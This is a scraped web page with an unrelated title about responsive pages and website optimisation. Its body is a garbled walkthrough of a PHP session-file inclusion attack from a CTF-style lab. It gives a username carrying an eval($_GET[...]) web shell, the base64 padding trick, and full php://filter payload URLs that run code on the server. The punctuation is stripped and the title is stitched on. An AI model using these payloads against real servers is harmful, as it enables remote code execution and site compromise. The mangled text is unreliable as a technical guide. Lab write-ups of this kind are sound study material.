当前位置：首页 > news >正文

响应式页面怎么写做网站优化的

news 2025/11/14 22:45:43

响应式页面怎么写,做网站优化的,程序员做个人网站,简述对网站进行评析的几个方面.这次使用的环境是ubuntunginxphpmysql 首先四个文件源码在以下链接中#xff1a; 一道CTF题#xff1a;PHP文件包含 | Chybeta 我们注册一个用户名111密码111#xff0c;然后登录查看cookie和linux的session#xff0c;因为我们的de服务器是手动搭建的#xff0c;所以…这次使用的环境是ubuntunginxphpmysql 首先四个文件源码在以下链接中一道CTF题PHP文件包含 | Chybeta 我们注册一个用户名111密码111然后登录查看cookie和linux的session因为我们的de服务器是手动搭建的所以容易知道session的位置。我们查看这个session cd /var/lib/php/sessions 发现我们的用户名以base64编码的格式放在了session中因此我们只要把含有木马的用户名注册了这个木马就会以base64编码的格式放在session中并且路径我们也是知道的。我们把一句话木马注册可以看到木马已经被放进数据库里面了session中也存在 15 192.168.87.134/session_upload/index.php?actionphp://filter/readconvert.base64-decode/resource/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1 但是上面的payload不能执行因为session中还包含着15位的前缀需要让其乱码需要重新注册一个base64编码后的名字长度大于100的 chybetachybetachybetachybetachybetachybetachybetachybetachybeta?php eval($_GET[atebyhc]) ? 重复上述步骤注册这个用户名 chybetachybetachybetachybetachybetachybetachybetachybetachybeta?php eval($_GET[atebyhc]) ? http://192.168.87.134/session_upload/index.php?actionphp://filter/readconvert.base64-decode/resource/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublktatebyhcphpinfo(); 成功

查看全文

http://www.zqtcl.cn/news/303100/